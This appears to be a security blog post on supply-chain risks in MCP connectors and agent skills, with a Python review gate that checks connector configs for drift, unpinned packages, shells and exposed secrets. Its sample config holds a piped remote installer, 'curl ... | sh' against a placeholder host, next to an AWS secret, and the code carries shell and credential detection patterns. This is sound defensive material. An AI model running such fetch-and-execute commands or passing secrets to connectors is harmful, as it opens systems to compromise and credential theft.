AI Security · Supply Chain
MCPs And Agent Skills Are A Supply Chain Problem
Useful automation still needs provenance, review, least privilege, and an assumption that helpful tools can be hostile.
Agent skills and MCP-style connectors are powerful because they let people package repeatable workflows, often with standing access to files, credentials, and a shell. That same packaging makes them easy to install and easy to trust too quickly.
This should feel familiar. Security teams have already learned painful lessons from dependencies, shell scripts, browser extensions, and CI plugins: a useful tool can still be a risky tool.
The review questions are not exotic:
- Who wrote this?
- What can it access?
- What commands can it run?
- What data can it transmit?
- Can the behavior change after approval?
- Is there a narrower way to grant the same capability?
The point is not to avoid automation. The point is to make useful automation reviewable, observable, and appropriately constrained.
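One way to make those review questions mechanical rather than aspirational is to gate connector definitions through a small checker before they are loaded. The example below is added here and is not code from the original post; it assumes the common `{"mcpServers": {name: {command, args, env}}}` config shape, uses hypothetical package names (`@example/fs-server`, `@example/notes-server`), and works over a constructed config and a constructed approval lockfile. Each check maps to one question from the list: a content-hash lockfile for provenance and post-approval drift, a pin check for packages fetched at start time, a shell/piped-installer check for what commands can run, a filesystem-root heuristic for what can be accessed, and an env-var scan for credentials the connector could transmit.

```python
"""Review gate for MCP-style connector definitions (illustrative example, not from the post).

Assumed config shape: {"mcpServers": {name: {"command": ..., "args": [...], "env": {...}}}}.
Package names and paths below are constructed for the example.
"""
import hashlib
import json
import re
from typing import Dict, List, Tuple

Finding = Tuple[str, str, str]  # (server name, severity, message)

PACKAGE_RUNNERS = {"npx", "uvx", "pipx", "bunx"}
SHELLS = {"sh", "bash", "zsh", "cmd", "cmd.exe", "powershell", "pwsh"}
SECRET_KEY = re.compile(r"(SECRET|TOKEN|PASSWORD|PASSWD|API_?KEY|PRIVATE)", re.I)
# npm-style spec that is pinned: optional @scope/, a name, then @<concrete version>.
PINNED = re.compile(r"^(@[^/@]+/)?[^@/]+@(?!latest$|next$)[^@]+$")

# Constructed sample config. 'files' mounts the whole filesystem with an unpinned
# package, 'deploy' pipes a remote installer into sh with a cloud secret in env,
# 'notes' is pinned and scoped to one directory.
SAMPLE_CONFIG = {
    "mcpServers": {
        "files": {"command": "npx", "args": ["-y", "@example/fs-server", "/"]},
        "deploy": {
            "command": "bash",
            "args": ["-c", "curl -s https://example.invalid/install.sh | sh"],
            "env": {"AWS_SECRET_ACCESS_KEY": "constructed-placeholder"},
        },
        "notes": {"command": "npx", "args": ["-y", "@example/notes-server@1.4.2", "/home/me/notes"]},
    }
}


def canonical_hash(server: dict) -> str:
    """Content hash of one server definition; an approval is tied to this exact value."""
    blob = json.dumps(server, sort_keys=True, separators=(",", ":")).encode()
    return hashlib.sha256(blob).hexdigest()


# Constructed lockfile: what a reviewer approved earlier. 'files' was approved with a
# pinned package and a narrow root; the live config above has since widened to "/".
APPROVED: Dict[str, str] = {
    "notes": canonical_hash(SAMPLE_CONFIG["mcpServers"]["notes"]),
    "files": canonical_hash({"command": "npx", "args": ["-y", "@example/fs-server@2.0.1", "/home/me/projects"]}),
}


def review_server(name: str, server: dict, approved: Dict[str, str]) -> List[Finding]:
    findings: List[Finding] = []
    command = server.get("command", "")
    args = [str(a) for a in server.get("args", [])]
    env = server.get("env", {})

    # Who wrote this? Can it change after approval? -> approval is bound to a content hash.
    if name not in approved:
        findings.append((name, "high", "not in approved lockfile"))
    elif approved[name] != canonical_hash(server):
        findings.append((name, "high", "definition changed since approval"))

    # Can the behavior change after approval? -> unpinned package resolved at start time.
    if command in PACKAGE_RUNNERS:
        specs = [a for a in args if not a.startswith("-")]
        if specs and not PINNED.match(specs[0]):
            findings.append((name, "high", f"unpinned package spec {specs[0]!r}"))

    # What commands can it run? -> a shell wrapper or piped installer means "anything".
    if command in SHELLS or any("| sh" in a or "|sh" in a or a.startswith("curl ") for a in args):
        findings.append((name, "high", "launches a shell / piped installer"))

    # What can it access? -> absolute paths at depth <= 2 ("/", "/home/me", "C:\\Users").
    for a in args:
        if re.match(r"^(/|[A-Za-z]:\\)", a) and len([p for p in re.split(r"[\\/]", a) if p]) <= 2:
            findings.append((name, "medium", f"broad filesystem root {a!r}"))

    # What data can it transmit? -> credentials handed to the connector's environment.
    for key in env:
        if SECRET_KEY.search(key):
            findings.append((name, "medium", f"secret-looking env var {key}"))

    return findings


def review_config(config: dict, approved: Dict[str, str]) -> List[Finding]:
    out: List[Finding] = []
    for name, server in config.get("mcpServers", {}).items():
        out.extend(review_server(name, server, approved))
    return out


def passes(findings: List[Finding]) -> bool:
    """Fail closed: any high-severity finding blocks loading the connector."""
    return not any(sev == "high" for _, sev, _ in findings)


if __name__ == "__main__":
    for f in review_config(SAMPLE_CONFIG, APPROVED):
        print(f)
```

Run against the constructed config, `notes` produces no findings and passes, `files` is blocked for drift from its approved hash, an unpinned package and a root of `/`, and `deploy` is blocked for being unapproved and for wrapping a piped installer, with a medium note about the AWS secret. The heuristics are deliberately coarse; their job is to force the review questions to be answered, not to replace the review.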